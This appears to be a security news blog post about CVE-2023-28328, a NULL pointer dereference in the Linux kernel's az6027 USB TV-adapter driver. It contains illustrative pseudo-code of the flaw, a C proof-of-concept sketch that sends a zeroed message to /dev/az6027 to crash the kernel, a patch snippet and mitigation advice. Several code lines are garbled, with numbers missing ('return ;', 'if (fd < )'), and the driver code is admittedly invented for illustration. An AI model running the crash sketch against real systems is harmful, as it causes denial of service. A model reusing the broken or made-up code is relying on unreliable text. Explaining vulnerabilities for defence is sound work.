CVE CyberSecurity Database News

CVE-2023-28328 - NULL Pointer Dereference in Linux Kernel az6027 USB Driver — A Deep Dive

Poster -

If you're running a Linux system and use digital TV adapters, this recent vulnerability might concern you. CVE-2023-28328 is a flaw in the Linux Kernel, specifically affecting the az6027 USB driver (drivers/media/usb/dev-usb/az6027.c). This issue boils down to not properly checking messages from user space before sending them to the device, which can lead to a NULL pointer dereference. That means, under the right conditions, an attacker could crash your system or cause a local denial-of-service (DoS).

In this post, we’ll break down how the vulnerability works, show some relevant code, explain how you might exploit it, and point to further reading.

What Is a NULL Pointer Dereference?

A NULL pointer dereference happens when the code tries to access or modify memory using a pointer that has not been initialized (where the value is literally NULL). In kernel drivers, such a case can crash the entire operating system—a much more serious error than in regular user-space programs.

Where Is the Problem?

The problem is in the function(s) in drivers/media/usb/dev-usb/az6027.c responsible for handling messages from user space. Normally, there should be checks to ensure any input it gets is valid before using it.

What goes wrong here?  
The driver takes messages from user space, doesn’t check if they are valid, and uses them directly. So, if a user passes a specially crafted message (most likely with a pointer set to NULL or other unexpected values), the code tries to use a NULL pointer—which crashes the kernel.

Here’s a simplified version inspired by the vulnerable code

// az6027.c fragment (pseudo-code for illustration)

// This function gets called to handle user messages
int az6027_message_handler(struct usb_device *udev, void __user *user_msg) {
    struct az6027_msg *msg;
    
    // Allocate kernel memory for the message structure
    msg = kmalloc(sizeof(*msg), GFP_KERNEL);
    if (!msg)
        return -ENOMEM;

    // Copy data from user space (no checks here)
    if (copy_from_user(msg, user_msg, sizeof(*msg))) {
        kfree(msg);
        return -EFAULT;
    }

    // Use msg without checking its contents
    process_az6027_message(udev, msg);  // <-- msg fields may be NULL or invalid

    kfree(msg);
    return ;
}

In the real code, you’ll find something like that: the structure from user space goes straight to device communication, but if a crucial pointer inside isn’t valid, things crash.

Attack Surface

* Who can exploit it: Any local user with access to the device node (like /dev/az6027*).
* What’s required: The ability to send crafted data/messages to the driver.
* What can happen: Kernel crash (panic), resulting in a system denial of service.

How Would an Exploit Work?

A proof-of-concept exploit would look like a small C program that opens the device file, fills a buffer with "bad" data (e.g., zeros out some pointer in the message), and sends it to the driver using an ioctl or write. The driver tries to use the (NULL) pointer, and the kernel crashes.

Example Exploit Sketch

#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>

struct az6027_msg {
    // ... fields
    void *data; // Assume this pointer is used in driver
    // other members...
};

int main() {
    int fd = open("/dev/az6027", O_RDWR);
    if (fd < ) {
        perror("open");
        return 1;
    }
    struct az6027_msg msg;
    memset(&msg, , sizeof(msg));  // All fields set to  (data pointer is NULL)
    // Depending on the ioctl/writing method
    ioctl(fd, /* appropriate ioctl */, &msg);
    // or write(fd, &msg, sizeof(msg));

    close(fd);
    return ;
}

What happens?
When the driver tries to dereference the data field (now NULL), kernel panic!

Input from user space is not sufficiently validated.

- The driver trusts that user-filled data contains valid, meaningful pointers— not necessarily true!

Patch

The fix is pretty simple: check all pointers and fields after copying from user space, before using them. If any required pointer is NULL or invalid, bail out.

if (!msg->data) {
    kfree(msg);
    return -EINVAL;
}

Upstream Kernel Patch Reference

* CVE-2023-28328 Commit
* CVE Report on NVD

* Apply patches from your Linux distributor (kernel updates post-March 2023).

* Restrict access to device nodes—avoid letting untrusted users access /dev/az6027*.

Further Reading

- Linux Kernel CVE-2023-28328 Patch
- NVD Entry: CVE-2023-28328
- How to avoid NULL pointer dereference in kernel code (Kernel documentation)

Summary

CVE-2023-28328 might look like a small bug in a niche driver, but it shows how trusting user input in the kernel is risky. If you use TV USB adapters using the az6027 chip (not uncommon for DVB receivers), make sure to update your kernel. Preventing unprivileged users from accessing device nodes is always a good extra step.

Stay safe, and always validate user data — especially in kernel code!

Timeline

Published on: 04/19/2023 23:15:00 UTC
Last modified on: 05/03/2023 14:15:00 UTC